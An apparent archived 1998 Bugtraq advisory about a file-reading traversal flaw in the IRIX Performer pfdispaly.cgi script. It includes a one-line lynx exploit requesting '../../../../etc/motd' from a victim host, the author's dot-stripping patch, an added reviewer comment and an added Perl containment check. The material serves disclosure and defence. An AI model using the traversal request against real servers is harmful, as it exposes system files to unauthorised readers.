IRIX performer_tools bug


J.A. Gutierrez (spd@GTC1.CPS.UNIZAR.ES)
Tue, 17 Mar 1998 00:06:48 +0100


> ----------
> From: J.A. Gutierrez[SMTP:SPD@GTC1.CPS.UNIZAR.ES]
> Sent: Monday, March 16, 1998 3:06:48 PM
> To: BUGTRAQ@NETSPACE.ORG
> Subject: IRIX performer_tools bug
> Auto forwarded by a Rule
>
    Do you remember the /cgi-bin/handler bug?

    Well, more of the same:

    Software:
    IRIX 6.2
    performer_tools.sw.webtools (Performer API Search Tool 2.2)
    /var/www/cgi-bin/pfdispaly.cgi

    Bug: Anyone can read files (as 'nobody') from your system:

    Exploit:

    lynx -source \
    'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

    for instance :-)

    Fix:

*** pfdispaly.cgi.O Mon Mar 16 23:13:34 1998
--- pfdispaly.cgi Mon Mar 16 23:36:29 1998
***************
*** 14,19 ****
--- 14,20 ----
  $fullcgiroot = "/var/www$cgiroot";

  $shortfilepath = "$ARGV[0]";
+ $shortfilepath =~ s/\.{2,}//g;
  $fullfilepath = "$maindocroot$shortfilepath";
  ($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;
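
Review bot: The added substitution `$shortfilepath =~ s/\.{2,}//g;` rewrites the request instead of rejecting it, so a path containing `..` is silently served as a different file under the root (the post's `/../../../../etc/motd` becomes `$maindocroot/////etc/motd`), and any legitimate name with two or more consecutive dots (`notes..txt`) is mangled. Prefer to refuse the request with an error when `..` appears, and since `$fullfilepath` is built on the next line by prepending `$maindocroot`, also verify that the resolved path still begins with `$maindocroot` rather than relying on stripping one pattern.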

    Note: I haven't tested the other Performer CGIs much;
    maybe they have more nasty bugs.
    (in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
    prepended; but somewhere 'dangerous' characters are escaped)

    There is another bug in pfsearch.cgi, which lacks a
    print "Content-type: text/html\n\n";
    line, so you get garbage in your browser.

    (and even worse, you have to enable JavaScript if you want
    to use this set of CGIs...)

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)
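
The check a reviewer would ask for, as an added example in Perl (not code from the original post or from the performer_tools package): the posted dot-stripping substitution next to a containment check that rejects traversal instead of rewriting the name. The value of $maindocroot and the request strings are assumptions constructed for the example.

```perl
#!/usr/bin/perl
# Added example, not code from the original post or from the performer_tools
# package. It puts the posted dot-stripping substitution beside a containment
# check that resolves the requested path lexically and refuses anything that
# would climb above the document root. The value of $maindocroot is assumed.
use strict;
use warnings;

my $maindocroot = "/var/www/htdocs";   # assumed; the real value is set inside pfdispaly.cgi

# What the posted patch does: delete every run of two or more dots, then
# prepend the document root, exactly as the original line did.
sub patched_path {
    my ($shortfilepath) = @_;
    $shortfilepath =~ s/\.{2,}//g;
    return "$maindocroot$shortfilepath";
}

# Alternative: walk the path components, resolve '.' and '..' lexically and
# collapse repeated slashes. Return undef (reject) instead of rewriting the
# name whenever '..' would leave $root or nothing is left to serve.
# Lexical only: it does not follow symlinks, so keep the web tree free of
# links pointing outside $root, or follow up with realpath() on the result.
sub contained_path {
    my ($root, $shortfilepath) = @_;
    return undef if $shortfilepath eq '' || $shortfilepath =~ /\0/;
    my @parts;
    for my $part (split m{/}, $shortfilepath) {
        next if $part eq '' || $part eq '.';     # leading or doubled '/' and '.' are no-ops
        if ($part eq '..') {
            return undef unless @parts;          # would climb above $root
            pop @parts;
            next;
        }
        push @parts, $part;                      # '...' or 'a..b' are ordinary names
    }
    return undef unless @parts;
    return join('/', $root, @parts);
}

# Constructed requests: a normal one, the traversal from the post, a name
# with a literal run of dots, and a relative path with a harmless '..'.
my @requests = (
    '/perf/index.html',
    '/../../../../etc/motd',
    '/notes..txt',
    'perf/../index.html',
);

for my $req (@requests) {
    my $safe = contained_path($maindocroot, $req);
    printf "%-24s  patched: %-36s  contained: %s\n",
        $req, patched_path($req), (defined $safe ? $safe : 'REJECTED');
}

# In the CGI itself a rejection should end the request with an error
# rather than fall through to open():
#   defined $fullfilepath or do {
#       print "Status: 403 Forbidden\nContent-type: text/plain\n\nForbidden\n";
#       exit 0;
#   };
```

Run it with perl: the "patched" column shows the traversal request quietly mapped to a file under the root with the dots removed and the legitimate notes..txt mangled to notestxt, while the "contained" column serves the normal, dotted and relative requests unchanged and rejects the traversal outright. If the script decodes %xx escapes itself, decode before calling the check, and because the check is lexical, a symlink inside the tree can still point outside it unless the result is also passed through realpath().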



This archive was generated by hypermail 2.0b3 on Fri Nov 20 1998 - 10:52:47 PST